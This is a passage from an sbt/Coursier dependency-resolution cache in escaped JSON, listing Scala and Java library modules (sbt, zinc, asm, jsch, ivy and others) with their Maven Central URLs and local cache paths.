ttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.lihaoyi\",\"name\":\"sourcecode_2.12\",\"revision\":\"0.1.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sourcecode_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/lihaoyi/sourcecode_2.12/0.1.3/sourcecode_2.12-0.1.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/sourcecode_2.12/0.1.3/sourcecode_2.12-0.1.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/lihaoyi/sourcecode\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"javax.annotation\",\"name\":\"jsr250-api\",\"revision\":\"1.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"javax.el\",\"name\":\"el-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.ejb3\",\"name\":\"jboss-ejb3-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.interceptor\",\"name\":\"jboss-interceptor-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jsr250-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://jcp.org/aboutJava/communityprocess/final/jsr250/index.html\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm-analysis\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm-analysis\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.jcraft\",\"name\":\"jsch\",\"revision\":\"0.1.54\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jsch\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/jcraft/jsch/0.1.54/jsch-0.1.54.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/jcraft/jsch/0.1.54/jsch-0.1.54.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.jcraft.com/jsch/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-scripted_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-scripted_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-scripted_2.12/1.3.3/util-scripted_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-scripted_2.12/1.3.3/util-scripted_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"javax.enterprise\",\"name\":\"cdi-api\",\"revision\":\"1.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"javax.el\",\"name\":\"el-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.ejb3\",\"name\":\"jboss-ejb3-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.interceptor\",\"name\":\"jboss-interceptor-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"cdi-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.commons\",\"name\":\"commons-lang3\",\"revision\":\"3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"commons-lang3\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://commons.apache.org/proper/commons-lang/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.maven\",\"name\":\"maven-model\",\"revision\":\"3.3.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"maven-model\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-cache_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-cache_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-cache_2.12/1.3.3/util-cache_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-cache_2.12/1.3.3/util-cache_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm-commons\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm-commons\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.logging.log4j\",\"name\":\"log4j-slf4j-impl\",\"revision\":\"2.11.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"log4j-slf4j-impl\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-slf4j-impl/2.11.2/log4j-slf4j-impl-2.11.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-slf4j-impl/2.11.2/log4j-slf4j-impl-2.11.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"net.java.dev.jna\",\"name\":\"jna-platform\",\"revision\":\"4.5.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jna-platform\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/4.5.0/jna-platform-4.5.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/net/java/dev/jna/jna-platform/4.5.0/jna-platform-4.5.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/java-native-access/jna\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"jline\",\"name\":\"jline\",\"revision\":\"2.14.6\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jline\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/jline/jline/2.14.6/jline-2.14.6.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/jline/jline/2.14.6/jline-2.14.6.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"sbt\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sbt\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/sbt/1.3.8/sbt-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/sbt/1.3.8/sbt-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.ant\",\"name\":\"ant-launcher\",\"revision\":\"1.9.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ant-launcher\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://ant.apache.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"protocol_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"protocol_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/protocol_2.12/1.3.8/protocol_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/protocol_2.12/1.3.8/protocol_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-reflect\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-reflect\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-reflect.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.lihaoyi\",\"name\":\"fastparse_2.12\",\"revision\":\"0.4.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"fastparse_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/lihaoyi/fastparse_2.12/0.4.2/fastparse_2.12-0.4.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/fastparse_2.12/0.4.2/fastparse_2.12-0.4.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/lihaoyi/scala-parser\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang.modules\",\"name\":\"scala-parser-combinators_2.12\",\"revision\":\"1.1.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-parser-combinators_2.12\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-lang/modules/scala-parser-combinators_2.12/1.1.2/scala-parser-combinators_2.12-1.1.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/modules/scala-parser-combinators_2.12/1.1.2/scala-parser-combinators_2.12-1.1.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.scala-lang.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc_2.12/1.3.4/zinc_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc_2.12/1.3.4/zinc_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.github.cb372\",\"name\":\"scalacache-caffeine_2.12\",\"revision\":\"0.20.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scalacache-caffeine_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/github/cb372/scalacache-caffeine_2.12/0.20.0/scalacache-caffeine_2.12-0.20.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/cb372/scalacache-caffeine_2.12/0.20.0/scalacache-caffeine_2.12-0.20.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/cb372/scalacache\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt.ivy\",\"name\":\"ivy\",\"revision\":\"2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ivy\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/ivy/ivy/2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19/ivy-2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/ivy/ivy/2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19/ivy-2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/ivy\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"logic_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"logic_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/logic_2.12/1.3.8/logic_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/logic_2.12/1.3.8/logic_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm-tree\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm-tree\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt.ipcsocket\",\"name\":\"ipcsocket\",\"revision\":\"1.0.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ipcsocket\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/ipcsocket/ipcsocket/1.0.0/ipcsocket-1.0.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/ipcsocket/ipcsocket/1.0.0/ipcsocket-1.0.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/ipcsocket\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-persist_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-persist_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-persist_2.12/1.3.4/zinc-persist_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-persist_2.12/1.3.4/zinc-persist_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"shaded-scalajson_2.12\",\"revision\":\"1.0.0-M4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifa